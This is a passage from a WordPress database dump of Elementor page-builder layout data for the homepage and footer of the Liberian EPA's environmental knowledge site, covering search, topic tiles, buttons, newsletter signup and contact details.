More\",\"background_color\":\"\",\"_id\":\"3d86158\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.infoliberia.info\\/wp-content\\/uploads\\/2021\\/08\\/slide_ccd.jpg\",\"id\":211,\"alt\":\"\",\"source\":\"library\"},\"background_ken_burns\":\"yes\"}],\"slides_height\":{\"unit\":\"px\",\"size\":370,\"sizes\":[]},\"content_animation\":\"fadeInLeft\"},\"elements\":[],\"widgetType\":\"slides\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"3832980\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"height\":\"min-height\",\"custom_height\":{\"unit\":\"px\",\"size\":120,\"sizes\":[]},\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"8ce7e10\"}],\"background_background\":\"classic\",\"background_color\":\"#0A3C1173\",\"margin\":{\"unit\":\"px\",\"top\":\"-30\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"f8bb5a9\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"db42395\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"a3ddb70\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"ecc2093\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":12.237},\"elements\":[],\"isInner\":true},{\"id\":\"73e3c60\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":77.08},\"elements\":[{\"id\":\"f4a4a39\",\"elType\":\"widget\",\"settings\":{\"search_placeholder_text\":\"Search Knowledge Resources...\",\"show_search_category_list\":\"yes\",\"search_category_select_placeholder\":\"Entire Resource\",\"results_counter_text\":\"Results\",\"full_results_btn_text\":\"See all results\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c6a37ad\",\"meta_format\":\"%s\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c698fbe\",\"meta_format\":\"%s\",\"date_format\":\"F j, Y\"}],\"negative_search\":\"Sorry, but nothing matched your search terms.\",\"server_error\":\"Sorry, but we cannot handle your search query now. Please, try again later!\",\"search_submit_bg_color\":\"rgba(0,100,0,0.86)\",\"search_category_color\":\"#000000\",\"search_taxonomy\":\"resource_category\",\"search_source\":[\"document\",\"institution\",\"mea_resource\",\"project_resource\",\"related_topic\"]},\"elements\":[],\"widgetType\":\"jet-ajax-search\"}],\"isInner\":true},{\"id\":\"e733e70\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":10.347},\"elements\":[],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"3b467af\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"4a9f59c\"}],\"padding\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"40\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"fb58b71\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"f8f4095\",\"elType\":\"widget\",\"settings\":{\"title\":\"Select a Topic\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":35,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"62059d5\",\"elType\":\"widget\",\"settings\":{\"style\":\"dotted\",\"width\":{\"unit\":\"%\",\"size\":10,\"sizes\":[]},\"align\":\"center\",\"text\":\"Divider\",\"color\":\"#54595f\",\"weight\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"},{\"id\":\"cc6fadf\",\"elType\":\"widget\",\"settings\":{\"min_height\":{\"unit\":\"px\",\"size\":450,\"sizes\":[]},\"show_terms\":\"\",\"show_terms_num\":\"2\",\"excerpt_length\":\"\",\"excerpt_trimmed_ending\":\"...\",\"show_date\":\"\",\"post_type\":\"related_topic\",\"custom_query_by\":\"ids\",\"post_ids\":\"468,470,473,474,487\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"5b2266b\",\"meta_format\":\"%s\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"76431bc\",\"meta_format\":\"%s\",\"date_format\":\"F j, Y\"}],\"boxes_gap\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"boxes_title_color\":\"#ffffff\",\"boxes_title_color_hover\":\"#006400\",\"boxes_title_typography_typography\":\"custom\",\"boxes_title_typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"boxes_title_typography_font_weight\":\"900\",\"boxes_title_alignment\":\"left\"},\"elements\":[],\"widgetType\":\"jet-blog-smart-tiles\"},{\"id\":\"724fd77\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore All Topics\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/related-topics\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"89e8d8c\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0fea759\"}],\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/home_4.jpg\",\"id\":258},\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"70\",\"right\":\"0\",\"bottom\":\"70\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5c4a65b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"100\",\"bottom\":\"0\",\"left\":\"150\",\"isLinked\":false}},\"elements\":[{\"id\":\"b82855d\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"45201a0\"}],\"reverse_order_tablet\":\"reverse-tablet\",\"reverse_order_mobile\":\"reverse-mobile\",\"hide_mobile\":\"hidden-phone\"},\"elements\":[{\"id\":\"9b26f8f\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"15\",\"isLinked\":false}},\"elements\":[{\"id\":\"8d9d9b1\",\"elType\":\"widget\",\"settings\":{\"title\":\"Explore by Institution\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"7448ecc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Explore Government and partner Institutions that have direct linkages with environmental policies and development.<\\/p>\",\"text_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"cdd4f69\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore By Insitution\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/institutions-resources\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"left\",\"selected_icon\":{\"value\":\"fas fa-long-arrow-alt-right\",\"library\":\"fa-solid\"},\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"a2777f6\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0fea759\"}],\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_land_climate.jpg\",\"id\":493},\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"70\",\"right\":\"0\",\"bottom\":\"70\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"cc16d03\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"100\",\"bottom\":\"0\",\"left\":\"150\",\"isLinked\":false}},\"elements\":[{\"id\":\"b4fc23b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"45201a0\"}]},\"elements\":[{\"id\":\"f419151\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"15\",\"isLinked\":false}},\"elements\":[{\"id\":\"99692db\",\"elType\":\"widget\",\"settings\":{\"title\":\"Explore by Document\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f7b0473\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Explore the EKMS Documents Database.<\\/p>\",\"text_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"259a529\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore All Documents\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/documents-database\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"left\",\"selected_icon\":{\"value\":\"fas fa-long-arrow-alt-right\",\"library\":\"fa-solid\"},\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8aa33ed\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"db429d4\"}],\"background_background\":\"classic\",\"shape_divider_bottom_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"shape_divider_bottom_height\":{\"unit\":\"px\",\"size\":82,\"sizes\":[]},\"shape_divider_bottom_flip\":\"yes\",\"padding\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"0\",\"bottom\":\"50\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5a37cd7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"df23907\",\"elType\":\"widget\",\"settings\":{\"title\":\"Latest News & Blogs\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":35,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"339607e\",\"elType\":\"widget\",\"settings\":{\"style\":\"dotted\",\"width\":{\"unit\":\"%\",\"size\":10,\"sizes\":[]},\"align\":\"center\",\"text\":\"Divider\",\"color\":\"#54595f\",\"weight\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"},{\"id\":\"684051a\",\"elType\":\"widget\",\"settings\":{\"number\":4,\"columns\":\"4\",\"equal_height_cols\":\"true\",\"title_trimmed\":\"yes\",\"title_length\":10,\"title_trimmed_ending_text\":\"...\",\"excerpt_length\":10,\"show_terms\":\"yes\",\"show_meta\":\"\",\"show_more\":\"\",\"more_text\":\"Read More\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"537281f\",\"meta_format\":\"%s\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"821cf97\",\"meta_format\":\"%s\",\"date_format\":\"F j, Y\"}],\"content_bg\":\"rgba(0,100,0,0.59)\",\"content_padding\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"15\",\"isLinked\":false},\"title_color\":\"#ffffff\",\"title_typography_typography\":\"custom\",\"title_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"title_typography_font_weight\":\"900\",\"excerpt_color\":\"rgba(255,255,255,0.75)\",\"excerpt_typography_typography\":\"custom\",\"excerpt_typography_font_size\":{\"unit\":\"px\",\"size\":13,\"sizes\":[]},\"terms_link_typography_typography\":\"custom\",\"terms_link_typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"terms_link_bg_color\":\"#6ec1e4\",\"show_author\":\"\",\"show_comments\":\"\",\"arrows\":\"\",\"autoplay\":\"\",\"infinite\":\"\",\"meta_title_related_position\":\"after\",\"meta_content_related_position\":\"after\",\"title_color_hover\":\"#000000\"},\"elements\":[],\"widgetType\":\"jet-posts\"},{\"id\":\"c151e2c\",\"elType\":\"widget\",\"settings\":{\"text\":\"Read All News & Blogs\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/news-and-blogs\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"selected_icon\":{\"value\":\"fas fa-long-arrow-alt-right\",\"library\":\"fa-solid\"},\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false}]'),(27073,3938,'_elementor_version','3.4.0'),(27074,3938,'_elementor_template_type','wp-page'),(27075,3938,'_elementor_page_settings','a:1:{s:21:\"background_background\";s:7:\"classic\";}'),(27077,3938,'_elementor_pro_version','3.3.6'),(27080,3939,'_elementor_edit_mode','builder'),(27081,3939,'_elementor_template_type','footer'),(27082,3939,'_elementor_version','3.3.1'),(27083,3939,'_elementor_pro_version','3.3.6'),(27084,3939,'_wp_page_template','default');
INSERT INTO `wp_postmeta` VALUES (27085,3939,'_elementor_data','[{\"id\":\"718abac\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"background_background\":\"classic\",\"background_color\":\"#0A3C11\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"4fdbdd5\"}],\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":true},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"cf58eb9\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5da1d9c\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"32fa8e3\"}]},\"elements\":[{\"id\":\"25535b6\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":25.91},\"elements\":[{\"id\":\"5e39944\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Subscribe To Our Newsletter\",\"text_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_weight\":\"500\",\"typography_text_transform\":\"uppercase\",\"typography_line_height\":{\"unit\":\"em\",\"size\":1.5,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"1a532ac\",\"elType\":\"widget\",\"settings\":{\"text\":\"Sign up now\",\"size\":\"xs\",\"selected_icon\":{\"value\":\"far fa-check-square\",\"library\":\"fa-regular\"},\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_font_weight\":\"900\",\"background_color\":\"#10CD2A00\",\"hover_color\":\"#0A3C11\",\"button_background_hover_color\":\"#FFFFFF\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"1\",\"right\":\"1\",\"bottom\":\"1\",\"left\":\"1\",\"isLinked\":true},\"border_radius\":{\"unit\":\"px\",\"top\":\"4\",\"right\":\"4\",\"bottom\":\"4\",\"left\":\"4\",\"isLinked\":true},\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/newsletter\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"5a88643\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":24.991,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"14\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"b4ebe3e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Contribute to the EKMS\",\"text_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_weight\":\"500\",\"typography_text_transform\":\"uppercase\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"6e044b0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Are you interested in contributing to the knowledge resources by submitting a blog, news, case study, report or a publication? <span style=\\\"color: #ffffff;\\\"><a style=\\\"color: #ffffff; text-decoration: underline;\\\" href=\\\"#\\\">Join here!<\\/a><\\/span><\\/p>\",\"text_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_size\":{\"unit\":\"px\",\"size\":18,\"sizes\":[]},\"typography_font_weight\":\"300\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":true},{\"id\":\"6387db7\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":27.927},\"elements\":[{\"id\":\"1653223\",\"elType\":\"widget\",\"settings\":{\"editor\":\"This Site\",\"text_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_weight\":\"500\",\"typography_text_transform\":\"uppercase\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"e621672\",\"elType\":\"widget\",\"settings\":{\"menu\":\"footer-menu\",\"layout\":\"vertical\",\"align_items\":\"left\",\"pointer\":\"none\",\"submenu_icon\":{\"value\":\"\",\"library\":\"\"},\"dropdown\":\"none\",\"menu_typography_typography\":\"custom\",\"menu_typography_font_family\":\"Roboto\",\"menu_typography_font_weight\":\"400\",\"menu_typography_text_transform\":\"uppercase\",\"color_menu_item\":\"#FFFFFF\",\"color_menu_item_hover\":\"#FFFFFF\",\"menu_space_between\":{\"unit\":\"px\",\"size\":-10,\"sizes\":[]},\"jet_family_widget_is_order_orientaion\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"-10\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"nav-menu\"}],\"isInner\":true},{\"id\":\"190105d\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":21.147},\"elements\":[{\"id\":\"5c7c794\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Contact\",\"text_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_weight\":\"500\",\"typography_text_transform\":\"uppercase\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"01d6428\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"Address:<br>4th Street, Sinkor\",\"selected_icon\":{\"value\":\"far fa-address-book\",\"library\":\"fa-regular\"},\"_id\":\"933aa45\"},{\"text\":\"Email:<br>contact@ekmsliberia.info\",\"selected_icon\":{\"value\":\"far fa-envelope\",\"library\":\"fa-regular\"},\"_id\":\"52f7dde\",\"link\":{\"url\":\"mailto:contact@ekmsliberia.info\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},{\"text\":\"Telephone:<br>+231775006254\",\"selected_icon\":{\"value\":\"fas fa-phone\",\"library\":\"fa-solid\"},\"_id\":\"5751132\"}],\"icon_color\":\"#FFFFFF\",\"text_color\":\"#FFFFFF\",\"icon_typography_typography\":\"custom\",\"icon_typography_font_family\":\"Roboto\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"icon_typography_font_weight\":\"300\"},\"elements\":[],\"widgetType\":\"icon-list\"}],\"isInner\":true}],\"isInner\":true},{\"id\":\"e2ebe37\",\"elType\":\"section\",\"settings\":{\"content_position\":\"middle\",\"structure\":\"40\",\"margin\":{\"unit\":\"px\",\"top\":\"10\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"gap\":\"no\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"d116479\"}]},\"elements\":[{\"id\":\"a4a3928\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":6.389},\"elements\":[{\"id\":\"0ad9417\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.infoliberia.info\\/wp-content\\/uploads\\/2021\\/08\\/gef_logo.jpg\",\"id\":92,\"alt\":\"\",\"source\":\"library\"},\"align\":\"right\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/www.thegef.org\",\"is_external\":\"on\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":true},{\"id\":\"d2ea495\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":69.964,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false}},\"elements\":[{\"id\":\"0cd4e1d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"This website was created and maintained with the financial support of the Global Environment Facility (GEF). Its contents are the sole responsibility of Environmental Protection Agency (EPA) and do not necessarily reflect the views of the Global Environment Facility.\",\"align\":\"left\",\"text_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_size\":{\"unit\":\"px\",\"size\":13,\"sizes\":[]},\"typography_font_weight\":\"300\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":true},{\"id\":\"cd2220c\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":12.677},\"elements\":[],\"isInner\":true},{\"id\":\"ec337e5\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":10.97,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false}},\"elements\":[],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2788d71\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"gap\":\"no\",\"background_background\":\"classic\",\"background_color\":\"#0A3C1173\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"1305dfd\"}]},\"elements\":[{\"id\":\"34e0d2e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"451b973\",\"elType\":\"section\",\"settings\":{\"content_position\":\"middle\",\"structure\":\"40\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b174925\"}]},\"elements\":[{\"id\":\"26b130d\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":11.416},\"elements\":[{\"id\":\"e50ba50\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Follow us\",\"text_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_weight\":\"800\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":true},{\"id\":\"b3a318e\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":14.38},\"elements\":[{\"id\":\"dc604f1\",\"elType\":\"widget\",\"settings\":{\"social_icon_list\":[{\"social_icon\":{\"value\":\"fab fa-facebook\",\"library\":\"fa-brands\"},\"_id\":\"56bfa9d\",\"link\":{\"url\":\"https:\\/\\/www.facebook.com\\/ekms.lib.7\",\"is_external\":\"true\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},{\"social_icon\":{\"value\":\"fab fa-twitter\",\"library\":\"fa-brands\"},\"_id\":\"9c51b4b\",\"link\":{\"url\":\"https:\\/\\/twitter.com\\/EkmsLiberia\",\"is_external\":\"true\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},{\"_id\":\"75309ad\",\"social_icon\":{\"value\":\"fab fa-instagram\",\"library\":\"fa-brands\"},\"link\":{\"url\":\"https:\\/\\/www.instagram.com\\/ekmsliberia\\/\",\"is_external\":\"true\",\"nofollow\":\"\",\"custom_attributes\":\"\"}}],\"shape\":\"circle\",\"align\":\"left\",\"icon_color\":\"custom\",\"icon_primary_color\":\"#0A3C11\",\"icon_size\":{\"unit\":\"px\",\"size\":13,\"sizes\":[]},\"icon_spacing\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"social-icons\"}],\"isInner\":true},{\"id\":\"40a5945\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":49.204,\"content_position\":\"center\"},\"elements\":[{\"id\":\"7ed1dce\",\"elType\":\"widget\",\"settings\":{\"editor\":\"This is an Official Web Platform of the Liberian Government.\",\"align\":\"center\",\"text_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_size\":{\"unit\":\"px\",\"size\":13,\"sizes\":[]},\"typography_font_weight\":\"400\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":true},{\"id\":\"7948b50\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"8cc0c42\",\"elType\":\"widget\",\"settings\":{\"align\":\"right\",\"text_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_size\":{\"unit\":\"px\",\"size\":13,\"sizes\":[]},\"typography_font_weight\":\"400\",\"__dynamic__\":{\"editor\":\"[elementor-tag id=\\\"3757d32\\\" name=\\\"current-date-time\\\" settings=\\\"%7B%22date_format%22%3A%22custom%22%2C%22custom_format%22%3A%22Y%22%2C%22before%22%3A%22Copyright%20%26copy%3B%20%22%2C%22after%22%3A%22.%20All%20Rights%20Reserved.%22%7D\\\"]\"}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false}]'),(27087,3939,'_elementor_conditions','a:1:{i:0;s:15:\"include/general\";}'),(27090,3940,'_elementor_edit_mode','builder'),(27091,3940,'_elementor_template_type','footer'),(27092,3940,'_elementor_version','3.4.0'),(27093,3940,'_elementor_pro_version','3.3.6'),(27094,3940,'_wp_page_template','default'),(27095,3940,'_elementor_data','[{\"id\":\"718abac\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"background_background\":\"classic\",\"background_color\":\"#0A3C11\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"4fdbdd5\"}],\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":true},\"padding\":{\"unit\":\"px\",\"top\